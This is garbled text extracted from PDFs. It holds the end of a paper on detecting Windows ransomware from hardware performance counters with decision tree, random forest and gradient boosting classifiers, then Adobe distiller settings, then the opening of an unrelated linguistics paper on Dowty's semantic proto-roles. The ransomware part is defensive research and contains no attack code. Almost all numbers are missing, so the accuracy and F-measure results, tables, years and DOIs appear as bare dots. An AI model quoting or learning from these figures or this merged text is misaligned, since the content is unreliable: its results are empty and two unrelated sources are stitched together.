gradient boosting classification model-based results are shown in fig. and table . the roc curve and precision-recall curve of both classes (i.e., ransomware and non-ransomware) are the same (i.e., . ). the extreme gradient boosting based model’s f-measure score is . , which is similar to the gradient boosting and random figure gradient boosting performance metrics behavior: (a) roc curves for the classes and . (b) precision-recall curves for the classes and . full-size doi: . /peerj-cs. /fig- table gradient boosting precision, recall and f-measure score for malware classes. malware class precision recall f-measure ransomware (class label ) . . . non-ransomware (class label ) . . . figure extreme gradient boosting performance metrics behavior: (a) roc curves for the classes and . (b) precision-recall curves for the classes and . full-size doi: . /peerj-cs. /fig- aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ forest-based classification as shown in table . the random forest-based classification model outperformed decision tree-based classification by attaining the accuracy of . , as shown in table . however, the value of the f-measure for both the classes is . (as shown in table ). the model has attained an improvement of % than the decision tree-based classification. the model shows similar f-measure results of . as observed for random forest and extreme gradient boosting. this study has demonstrated the possibility of exploiting hpcs as the potential features for ransomware detection. after analyzing the sets of ransomware and non- ransomware, the features obtained from hpcs have been analyzed to classify malicious applications into ransomware and non-ransomware categories using several machine learning algorithms such as decision tree, random forest, gradient boosting and extreme gradient boosting. the results of detailed experiments as stated earlier in the section have revealed that extracted hardware features play a significant role in the detection and identification of ransomware. among all the employed machine learning classifiers, the random forest-based model and extreme gradient boosting have outperformed by yielding f-measure score of . followed by a decision tree that achieved . f-measure. moreover, the features cache misses, task clock, and branches obtained through hpcs could be deemed as potential parameters in classifying ransomware from non- ransomware. conclusions in this article, the analysis of hpcs has been presented for windows ransomware classification. the results have revealed that the hpcs hold the considerable potential to expose hidden indicators of the executing applications such as malicious codes and ransomware. performance counters, that is, cache misses, task clock and branches have played a pivotal role in classifying ransomware in a way that if there are a high number of cache misses or a high number of branch mispredictions (where control flow becomes detectably anomalous) are good indicators that help in indicating a potential attack (foreman, ). the proposed technique holds adequate potential to provide sufficient table extreme gradient boosting precision, recall and f-measure score for malware. malware class precision recall f-measure ransomware (class label ) . . . non-ransomware (class label ) . . . table four classifiers result and their comparison f-measure score. classifier f-measure decision tree . random forest . gradient boosting . extreme gradient boosting . aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ detection accuracy by attaining the f-measure score of . . this study demonstrated the possibility of exploiting hpcs as the potential feature for the detection of ransomware. however, this topic needs further investigation. in the future, we intend to scrutinize other dynamic features with the combination of call graphs to detect and classify ransomware. moreover, the application of machine learning algorithms has shown very promising results in ransomware detection. in the future, we will expand this study to perform in-depth static analysis as well as dynamic analysis with the combination of hpcs in the detection of that ransomware that usually hides by implementing various obfuscation techniques (like packed or compressed programs, or indirect addressing (behera & bhaskari, )). one major challenge and limitation of this research is in ransomware detection of false positives and false negatives. consider the case of qwerty ransomware, which uses a benign gpg executable to perform encryption. perhaps the proposed solution would correctly detect the gpg binary when used in this way, but we suspect it would also detect it in a benign case. since in this work we did not evaluate benign executables, it is not clear how the system performs with software that performs encryption and/or compression tasks which is the limitation of this research that will be investigated in our future work. moreover, the collected features are related to hardware-specific environments, so if the system having the same architecture then the trained classification models are applicable as it is. however, in case the hardware environment is different (i.e., different architecture) then we have to retrain our machine learning models for that specific hardware environment. this is one of the limitations of our proposed work that the machine learning models trained on specific architecture are not portable across other machine architectures. moreover, due to the modest dataset deep learning mechanism at present are not applicable. however, in the future, we intend to extend our dataset to implement more robust auto denoising encoders, which comprises of multiple layers of neural networks and are best-known for providing good accuracy. additional information and declarations funding the work was partially funded by deanship of graduate studies and research (dgsr), ajman university, uae. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: deanship of graduate studies and research (dgsr). competing interests muhammad aleem is an academic editor for peerj. aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ author contributions � sana aurangzeb conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � rao naveed bin rais conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � muhammad aleem conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � muhammad arshad islam conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � muhammad azhar iqbal conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: raw data and sample python script are available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahmadian mm, shahriari hr, ghaffarian sm. . connection-monitor & connection-breaker: a novel approach for prevention and detection of high survivable ransomwares. new york: ieee, – . al-rimy bas, maarof ma, shaid szm. . a -day aware crypto-ransomware early behavioral detection framework. cham: springer, – . al-rimy bas, maarof ma, shaid szm. . ransomware threat success factors, taxonomy, and countermeasures: a survey and research directions. computers & security : – doi . /j.cose. . . . alam m, sinha s, bhattacharya s, dutta s, mukhopadhyay d, chattopadhyay a. . rapper: ransomware prevention via performance counters. arxiv available at http://arxiv.org/ abs/ . . ali a. . ransomware: a research and a personal case study of dealing with this nasty malware. issues in informing science and information technology : – doi . / . alzahrani n, alghazzawi d. . a review on android ransomware detection using deep learning techniques. in: proceedings of the th international conference on management of digital ecosystems. – . anderson d, thane f, alfonso v. . next-generation intrusion detection expert system (nides): a summary. computer science laboratory sri-csl- - . available at http://www.csl.sri.com/papers/ sri/ sri.pdf. andronio n, zanero s, maggi f. . heldroid: dissecting and detecting mobile ransomware. new york: springer international publishing, – . aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cose. . . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . / http://www.csl.sri.com/papers/ sri/ sri.pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ aurangzeb s, aleem m, iqbal ma, islam ma. . ransomware: a survey and trends. journal of information assurance and security : – . bahador mb, abadi m, tajoddin a. . hpcmalhunter: behavioral malware detection using hardware performance counters and singular value decomposition. new york: ieee, – . bahador mb, abadi m, tajoddin a. . hlmd: a signature-based approach to hardware-level behavioral malware detection and classification. journal of supercomputing ( ): – doi . /s - - -z. basu k, krishnamurthy p, khorrami f, karri r. . a theoretical study of hardware performance counters-based malware detection. ieee transactions on information forensics and security : – doi . /tifs. . . behera ck, bhaskari dl. . different obfuscation techniques for code protection. procedia computer science : – doi . /j.procs. . . . beneventi f, bartolini a, cavazzoni c, benini l. . continuous learning of hpc infrastructure models using big data analytics and in-memory processing tools. new york: ieee, – . black p, sohail a, gondal i, kamruzzaman j, vamplew p, watters p. . api based discrimination of ransomware and benign cryptographic programs. in: international conference on neural information processing. cham: springer, – . bradley a. . the use of the area under the roc curve in the evaluation of machine learning algorithms. pattern recognition ( ): – doi . /s - ( ) - . brewer r. . ransomware attacks: detection, prevention and cure. network security ( ): – doi . /s - ( ) - . chen z, kang h, yin s, kim s. . automatic ransomware detection and analysis based on dynamic api calls flow graph. in: proceedings of the international conference on research in adaptive and convergent systems, – doi . / . . chen q, robert ab. . automated behavioral analysis of malware a case study of wanna cry ransomware. arxiv available at http://arxiv.org/abs/ . . chen t, tong h. . xgboost: extreme gradient boosting. r package v . . . , – . available at http://cran.fhcrc.org/web/packages/xgboost/vignettes/xgboost.pdf. chiappetta m, savas e, yilmaz c. . real time detection of cache-based side-channel attacks using hardware performance counters. applied soft computing : – doi . /j.asoc. . . . chung m. . why employees matter in the fight against ransomware. computer fraud & security ( ): – doi . /s - ( ) - . das s, werner j, antonakakis m, polychronakis m, monrose f. . sok: the challenges, pitfalls, and perils of using hardware performance counters for security. in: ieee symposium on security and privacy. piscataway: ieee, – . davies sr, macfarlane r, buchanan wj. . evaluation of live forensic techniques in ransomware attack mitigation. forensic science international: digital investigation : doi . /j.fsidi. . . demme j, maycock m, schmitz j, tang a, waksman a, sethumadhavan s, stolfo s. . on the feasibility of online malware detection with performance counters. acm sigarch computer architecture news ( ): – doi . / . . de melo ac. . the new linux ‘perf’ tools. in: slides from linux kongress. vol. . available at http://www.linux-kongress.org/ /slides/lk -perf-acme.pdf. aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /tifs. . http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://arxiv.org/abs/ . http://cran.fhcrc.org/web/packages/xgboost/vignettes/xgboost.pdf http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.fsidi. . http://dx.doi.org/ . / . http://www.linux-kongress.org/ /slides/lk -perf-acme.pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dion y, brohi sn. . an experimental study to evaluate the performance of machine learning alogrithms in ransomware detection. journal of engineering science and technology ( ): – . flater d. . screening for factors affecting application performance in profiling measurements. us department of commerce, national institute of standards and technology, report number: nist tn doi . /nist.tn. . foreman jc. . a survey of cyber security countermeasures using hardware performance counters. arxiv available at http://arxiv.org/abs/ . . friedman jh. . reitz lecture—greedy function approximation: a gradient boosting machine. annals of statistics ( ): – . gazet a. . comparative analysis of various ransomware virii. journal in computer virology ( ): – doi . /s - - - . grant l, parkinson s. . identifying file interaction patterns in ransomware behaviour. in: parkinson s, crampton a, hill r, eds. guide to vulnerability analysis for computer networks and systems. computer communications and networks. cham: springer, – . hampton n, baig z, zeadall s. . ransomware behavioural analysis on windows platform. journal of information security and applications : – doi . /j.jisa. . . . jbabdi s, sotiropoulos sn, savio am, graña m, behrens te. . model-based analysis of multishell diffusion mr data for tractography: how to get over fitting problems. magnetic resonance in medicine ( ): – doi . /mrm. . jordan mi, mitchell tm. . machine learning: trends, perspectives, and prospects. science ( ): – doi . /science.aaa . kadiyala sp, jadhav p, lam sk, srikanthan t. . hardware performance counter-based fine-grained malware detection. acm transactions on embedded computing systems ( ): – . kaur g, dhir r, singh m. . anatomy of ransomware malware: detection, analysis and reporting. international journal of security and networks ( ): – doi . /ijsn. . . kharraz a, arshad s, mulliner c, robertson wk. . unveil: a large-scale, automated approach to detecting ransomware. in: usenix security symposium. – . kharraz a, robertson w, balzarotti d, bilge l, kirda e. . cutting the gordian knot: a look under the hood of ransomware attacks. in: international conference on detection of intrusions and malware, and vulnerability assessment. cham: springer, – . kim d, soh w, kim s. . design of quantification model for prevent of cryptolocker. indian journal of science and technology ( ):e doi . /ijst/ /v i / . kimberly t, salahuddin jk, aristide f, lorenzo c. . copperdroid: automatic reconstruction of android malware behaviors. ndss symposium : – . kohavi r. . scaling up the accuracy of naive-bayes classifiers: a decision-tree hybrid. in: kdd proceedings. citeseer, . kok s, abdullah a, jhanjhi n, supramaniam m. . ransomware, threat and detection techniques: a review. international journal of computer science and network security ( ): . kouliaridis v, kambourakis g. . feature importance in mobile malware detection. arxiv preprint arxiv: . . kuruvila ap, kundu s, basu k. . analyzing the efficiency of machine learning classifiers in hardware-based malware detectors. in: ieee computer society annual symposium on vlsi (isvlsi). piscataway: ieee, – . aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nist.tn. http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.jisa. . . http://dx.doi.org/ . /mrm. http://dx.doi.org/ . /science.aaa http://dx.doi.org/ . /ijsn. . http://dx.doi.org/ . /ijst/ /v i / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kuznetsova i, karpievitch yv, filipovska a, lugmayr a, holzinger a. . review of machine learning algorithms in differential expression analysis. arxiv preprint arxiv: . . lee jk, moon sy, park jh. . cloudrps: a cloud analysis based enhanced ransomware prevention system. journal of supercomputing ( ): – doi . /s - - - . li j, cheng k, wang s, morstatter f, trevino rp, tang j, liu h. . feature selection: a data perspective. acm computing surveys ( ): – . liaw a, wiener m. . classification and regression by randomforest. r news ( ): – . liu x, liu j. . a two-layered permission-based android malware detection scheme. in: nd ieee international conference on mobile cloud computing, services, and engineering. piscataway: ieee, – . maiorca d, mercaldo f, giacinto g, visaggio ca, martinelli f. . r-packdroid: api package-based characterization and detection of mobile ransomware. in: proceedings of the symposium on applied computing. – . malone c, zahran m, karri r. . are hardware performance counters a cost effective way for integrity checking of programs. in: proceedings of the sixth acm workshop on scalable trusted computing. new york: acm, – . maurya a, kumar n, agrawal a, khan r. . ransomware: evolution, target and safety measures. international journal of computer sciences and engineering ( ): – . metz ce. . basic principles of roc analysis. seminars in nuclear medicine ( ): – doi . /s - ( ) - . mucci pj, browne s, deane c, ho g. . papi: a portable interface to hardware performance counters. in: proceedings of department of defense hpcmp users group conference. narudin fa, feizollah a, anuar nb, gani a. . evaluation of machine learning classifiers for mobile malware detection. soft computing ( ): – doi . /s - - - . or-meir o, nissim n, elovici y, rokach l. . dynamic malware analysis in the modern era— a state of the art survey. acm computing surveys ( ): – doi . / . pedregosa f, varoquaux g, gramfort a, michel v, thirion b, grisel o, blondel m, prettenhofer p, weiss r, dubourg v, vanderplas j. . scikit-learn: machine learning in python. journal of machine learning research : – . ramesh g, menen a. . automated dynamic approach for detecting ransomware using finite-state machine. decision support systems : doi . /j.dss. . . scalas m, maiorca d, mercaldo f, visaggio ca, martinelli f, giacinto g. . on the effectiveness of system api-related information for android ransomware detection. computers & security : – doi . /j.cose. . . . sgandurra d, muñoz-gonzález l, mohsen r, lupu ec. . automated dynamic analysis of ransomware: benefits, limitations and use for detection. arxiv preprint arxiv: . v . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv preprint arxiv: . . singh b, evtyushkin d, elwell j, riley r, cervesato i. . on the detection of kernel-level rootkits using hardware performance counters. in: proceedings of the acm on asia conference on computer and communications security. – . song s, kim b, lee s. . the effective ransomware prevention technique using process monitoring on android platform. advances in mobile security technologies ( ): – doi . / / . aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /j.dss. . http://dx.doi.org/ . /j.cose. . . http://dx.doi.org/ . / / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tan pn, steinbach m, kumar v. . classification: basic concepts, decision trees, and model evaluation. introduction to data mining : – . victoriano ob. . exposing android ransomware using machine learning. in: proceedings of the international conference on information system and system management. – . wang x, chai s, isnardi m, lim s, karri r. . hardware performance counter-based malware identification and detection with adaptive compressive sensing. acm transactions on architecture and code optimization ( ): – . weaver vm. . linux perf_event features and overhead. in: the nd international workshop on performance analysis of workload optimized systems. vol. . urbandale: fastpath. xu z, ray s, subramanyan p, malik s. . malware detection using machine learning based analysis of virtual memory access patterns. in: proceedings of the conference on design, automation & test in europe european design. – . xuan s, liu g, li z, zheng l, wang s, jiang c. . random forest for credit card fraud detection. in: ieee th international conference on networking, sensing and control. piscataway: ieee, – . yang t, yang y, qian k, tao l. . automated detection and analysis for android ransomware. new york: ieee, – . zavarsky p, lindskog d. . experimental analysis of ransomware on windows and android platforms: evolution and characterization. procedia computer science : – doi . /j.procs. . . . zhang h, xiao x, mercaldo f, ni s, martinelli f, sangaiah ak. . classification of ransomware families with machine learning based on n-gram of opcodes. future generation computer systems : – doi . /j.future. . . . zhang m, xu b, wang d. . an anomaly detection model for network intrusions using one-class svm and scaling strategy. cham: springer, – . zhang x, zhao j, lecun y. . character-level convolutional networks for text classification. in: advances in neural information processing systems. – . zhou b, gupta a, jahanshahi r, egele m, joshi a. . hardware performance counters can detect malware: myth or fact? in: proceedings of the on asia conference on computer and communications security. – . aurangzeb et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the classification of microsoft-windows ransomware using hardware profile introduction related work motivation and methodology results and discussion conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs /cht /dan /deu /esp /fra /ita /jpn /kor /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor /ptb /suo /sve /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice semantic proto-roles drew reisinger rachel rudinger francis ferraro craig harman kyle rawlins∗ benjamin van durme∗ {rawlins@cogsci, vandurme@cs}.jhu.edu johns hopkins university abstract we present the first large-scale, corpus based verification of dowty’s seminal theory of proto-roles. our results demonstrate both the need for and the feasibility of a property-based annotation scheme of semantic relationships, as opposed to the currently dominant notion of categorical roles. introduction for decades researchers have debated the number and character of thematic roles required for a theory of the syntax/semantics interface. agent and pa- tient are canonical examples, but questions emerge such as: should we have a distinct role for bene- ficiary? what about recipient? what are the boundaries between these roles? and so on. dowty ( ), in a seminal article, responded to this debate by constructing the notion of a proto- agent and proto-patient, based on entailments that can be mapped to questions, such as: “did the ar- gument change state?”, or “did the argument have volitional involvement in the event?”. dowty argued that these properties group together in the lexicon non-categorically, in a way that aligns with clas- sic agent/patient intuitions. for instance, a proto- patient often both changes state (but might not), and often is causally affected by another participant. various resources have been developed for com- putational linguists working on ‘semantic role la- beling’ (srl), largely under the classical, categor- ical notion of role. here we revisit dowty’s re- ∗corresponding authors. search as computational linguists desiring data for a new task, semantic proto-role labeling (sprl), in which existing coarse-grained categorical roles are replaced by scalar judgements of dowty-inspired properties. as the availability of supporting data is a critical component of such a task, much of our ef- forts here are focused on showing that everyday en- glish speakers (untrained annotators) are able to an- swer basic questions about semantic relationships. in this work we consider the following questions: (i) can crowdsourcing methods be used to empiri- cally validate the formal linguistic theory of dowty, following prior work in psycholinguistics (kako, b)? (ii) how might existing semantic anno- tation efforts be used in such a pursuit? (iii) can the pursuit of dowty’s semantic properties be turned into a practical and scalable annotation task? (iv) do the results of such an annotation task (at various scales, including over very large corpora) continue to confirm dowty’s proto- role hypothesis? and fi- nally, (v) how do the resulting configurations of fine- grained role properties compare to coarser annotated roles in resources such as verbnet? we first derive a set of basic semantic ques- tions pertaining to dowty-inspired properties. these questions are used in two mechanical turk hits that address the above issuess. in the first hit, we build on psycholinguistic work (kako, b) to directly access ‘type-level’ intuitions about a lexical item, by asking subjects property-questions using made-up (“nonce”) words in argument positions. our results to be clear, dowty himself does not make direct predic- tions about the distribution of proto-role properties within a cor- pus, except insofar as a corpus is representative of the lexicon. transactions of the association for computational linguistics, vol. , pp. – , . action editor: diana mccarthy. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by . license. replicate these previous experiments, and demon- strate that what can be done in this domain in a controlled lab experiment can be done via crowd- sourcing. we extend this to a large-scale mturk an- notation task using corpus data. this task presents an annotator with a particular (‘token-level’) sen- tence from propbank (palmer et al., ) and a highlighted argument, and asks them for a likelihood judgment about a property; for example, “how likely or unlikely is it that arg is sentient?”. by looking across many token-level instances of a verb, we can then infer type-level information about the verb. we discuss results from this task over role properties annotated by a single (trusted) annota- tor on approximately verb tokens. our results represent the first large-scale corpus study explicitly aimed at confirming dowty’s proto-role hypothesis: proto-agent properties predict the mapping of se- mantic arguments to subject and object. we show that this allows us to both capture and discover fine- grained details of semantic roles that coarser anno- tation schemes such as verbnet do not: empirically, this data set shows a great degree of role fragmen- tation, much greater than any existing annotation scheme allows. the results of this task represent a new large-scale annotated resource, involving close to hours of human effort. background . roles in linguistics thematic roles have been a key analytical compo- nent in modern linguistic theory. despite the vast literature, there is surprisingly little consensus over what a thematic role is, or how to identify or pre- cisely characterize them. a ‘textbook’ approach, in- fluential in linguistics and computer science, is that there is a (short) list of core generalized thematic roles, such as agent, patient, experiencer, available through the jhu decompositional semantics ini- tiative (decomp): http://decomp.net . a full accounting of the history of thematic roles is be- yond the scope available here (blake, ; gruber, ; fill- more, ; ; ; castañeda, ; jackendoff, ; ; cruse, ; talmy, ; chomsky, ; carlson, ; carlson and tanenhaus, ; rappaport and levin, ; rappaport hovav and levin, ; levin and rappaport hovav, ; dowty, ; ; parsons, ; croft, ; davis and koenig, , among others). etc. that verbs assign to arguments. however, it has been known for some time that this view is prob- lematic (see levin and rappaport hovav ( ) for an overview). perhaps the best known arguments emerge from the work of david dowty. proto-roles dowty ( ), in an exhaustive sur- vey of research on thematic roles up to that point, identifies a number of problems with generalized thematic roles. first and foremost, if the inven- tory of role types is small, then it proves impos- sible to clearly delineate the boundaries between role types. this situation pushes researchers who want clean role boundaries towards a very large in- ventory of specialized, fine-grained thematic roles – what dowty termed role fragmentation. a large, fragmented set of role-types may be useful for many purposes, but not for expressing generaliza- tions that should be stated in terms of thematic roles. dowty ( ) focuses on generalizations related to the mapping problem: how are syntactic arguments mapped to semantic arguments? the mapping prob- lem is not just a linguistic puzzle, but a central prob- lem for tasks such as srl, semantic parsing, etc. dowty offers a solution to the mapping problem couched not in terms of fine-grained fragmented thematic roles, but in terms of what dowty analo- gizes to ‘prototype’ concepts constructed over fine- grained role properties. in particular, the role- properties are features such as whether the partic- ipant in question causes the event to happen, or whether the participant changes state. dowty groups properties into two classes: proto-agent properties, and proto-patient properties. a semantic argument is more agent-like the more proto-agent proper- ties it has, and more patient-like the more proto- patient properties it has. these two sets of properties are in competition, and an argument can have some of each, or even none of the properties. dowty’s role properties (slightly modified) are shown in table ; we use these as a starting point for our own choice of fine-grained features in § . classic role types fall out from what we will dowty’s argument selection principle: “in predicates with grammatical subject and object, the argument for which the predicate entails the greatest number of proto-agent properties will be lexicalized as the subject of the predicate; the argument having the greatest number of proto-patient entailments will be lexicalized as the direct object.” (dowty : ) proto-agent properties proto-patient properties a. volitional involvement f. changes state b. sentience (/perception) g. incremental theme c. causes change of state h. causally affected d. movement (relative) i. stationary (relative) e. independent existence j. no indep. existence table : proto-role properties (dowty : – ). term configurations of these properties. a ‘core’ agent, for example, would have all of the proto- agent properties. an experiencer would have proto-agent properties (b) and (e), and proto-patient property (h), and so would be less agent-like than a core agent. this idea is further developed by grimm ( ; ), who points out that when combinations of proto-role properties are looked at as a lattice structure, generalized thematic roles can be identified with particular parts of the lattice. if dowty’s proposal is right, the lexicon will instanti- ate a very large number of property configurations, rather than a small and constrained set. a key result of this theory is explanation of the contrast between what dowty terms stable and un- stable predicates. a stable predicate is one like kill whose mapping behavior is similar across languages – the killer is mapped to subject, and the vic- tim to object. an unstable predicate is one where this is not so. instability can also manifest within a language, in the form of lexical doublets such as buy and sell. the proto-patient argument for these verbs is stable, but the subject alternates: for buy it is the goal argument that appears as subject while for sell it is the source. dowty’s explanation is that for transaction events, source and goal are very similar in their proto-agent properties, and so compete equally for subject position. dowty’s linguistic proposal, if correct, has sub- stantial implications for human language technol- ogy (see also discussion in palmer et al. ( )). it suggests an approach to semantic annotation, se- mantic parsing, and related tasks that focuses on this fine-grained level of proto-role properties, with any more generalized thematic roles as emergent property configurations. if lexical argument struc- ture is organized around proto-roles, then we predict that we will find this organization reflected in cor- pora, and that token-level annotations of verb mean- ings would benefit from observing this organiza- proto−agent proto−patient stationary changed created moved existed chose caused do caused change aware − − mean difference (subject − object) figure : proto-role properties in kako exp. (re- production of kako’s fig. ). error bars in all figures show % t-test cis. tion. in particular, an annotation strategy that takes the proto-role hypothesis seriously would annotate verbs for properties such those shown in table . experimental work can the proto-role hypothe- sis be operationalized? a starting point is experi- mental work by kako ( a,b), who took the proto- role hypothesis into the lab. kako developed several experimental versions of the hypothesis, whereby participants were asked simplified question-based versions of dowty’s proto-role properties about sen- tences of english. kako did not use actual or attested sentences of english, but rather focused on ‘nonce’- based tasks. that is, he constructed stimuli by taking constructed sentences of english containing the tar- get verbs, and replacing noun positions with nonce words like dax. subjects were then presented with these nonce sentences and asked questions such as, “how likely is it that the dax moved?”. the nonce-method is designed to access ‘type- level’ judgments about verbs across frames. across all experiments, kako confirms a version of the proto-role hypothesis: subject arguments across the verbs he examines have significantly more proto- agent than proto-patient properties, and vice versa for objects. fine-grained results for individual proto-role properties from one of his experiments are shown in figure : this presents an aggregate measure of the success of the proto-role hypothesis, showing the mean difference between property rat- ings for subject vs. object arguments. dowty’s map- ping hypothesis predicts that subjects should skew towards proto-agent properties, and objects towards proto-patient properties, exactly kako’s finding. kako’s work help lead alishahi and stevenson ( ) to annotate a small collection of child di- rected speech with dowty-inspired properties, used to evaluate a bayesian model for inducing what they termed semantic profiles. . roles in computational linguistics propbank propbank (palmer et al., ) lay- ers predicate/argument annotations on the english portion of the penn treebank (ptb) (marcus et al., ), treating semantic role annotation as a sort of slot-filling exercise: a frameset defines a set of se- mantic roles that a particular type of predicate may use. every verb is assigned a frameset (roughly, a verb sense), and arguments of the verb (potentially a non-contiguous span) are labeled with a particu- lar role. coarse categorical labels, such as arg and arg , allow propbank to both capture some of levin ( )’s syntactic variations, and imbue this syntactic information with shallow semantics. an- notations do not cross sentence boundaries. as every verb in the ptb was annotated, prop- bank has good coverage: , framesets cover around , verb types. additional resources have adopted and extended propbank, e.g. (weischedel et al., , etc.), and there have been multiple shared tasks centered around propbank-style srl (carreras and màrquez, ). however, at three days (palmer et al., ), the training time for an annotator is significantly higher than the crowd- sourcing solution we pursue here. verbnet and semlink verbnet (schuler, ) provides a class-based view of verbs. it applies levin’s verb classes (levin, ) to more than five thousand (english) verbs, categorizing them accord- probability distributions over observed configurations that capture a generalized notion of semantic (proto-)role. this section is not a fully exhaustive list of resources, and we omit discussion of several important ones that are comple- mentary to our 